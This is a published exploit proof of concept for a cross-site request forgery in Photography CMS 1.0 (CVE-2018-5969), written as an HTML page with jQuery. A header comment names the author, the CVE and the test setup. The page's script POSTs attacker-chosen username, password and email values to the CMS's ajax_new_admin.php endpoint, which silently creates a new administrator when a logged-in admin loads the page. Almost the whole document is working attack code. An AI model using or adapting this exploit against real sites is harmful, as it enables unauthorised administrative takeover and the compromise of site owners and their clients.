<!--
# # # # # 
# Exploit Title: Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://ronnieswietek.com/
# Software Link: https://codecanyon.net/item/client-photo-studio-photography-cms/1191688
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5969
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# 
# Proof of Concept:
# 1)
-->
<html>
<body>
<script src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
<h2>New Admin</h2>
<div class="efe">
<form method="post" onSubmit="return false">
    <label for="username">Username:</label>
    <input id="username" type="text"><br><br>
 
    <label for="password1">Password:</label>
    <input id="password1" type="password"><br><br>
 
    <label for="password2">Confirm Password:</label>
    <input id="password2" type="password"><br><br>
 
    <label for="email">Email:</label>
    <input id="email" type="text"><br><br>
 
    <input id="ekleabi" value="Ver Ayari" type="submit">
</form>
</div>
<script type="text/javascript">
    $("#ekleabi").live('click',function()
    {
        $.ajax({
            type: "POST",
            url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajax_new_admin.php",
            data:{
                username:$(".efe #username").val(),
                password1:$(".efe #password1").val(),
                password2:$(".efe #password2").val(),
                email:$(".efe #email").val()
            }
        });
    });
</script>
</body>
</html>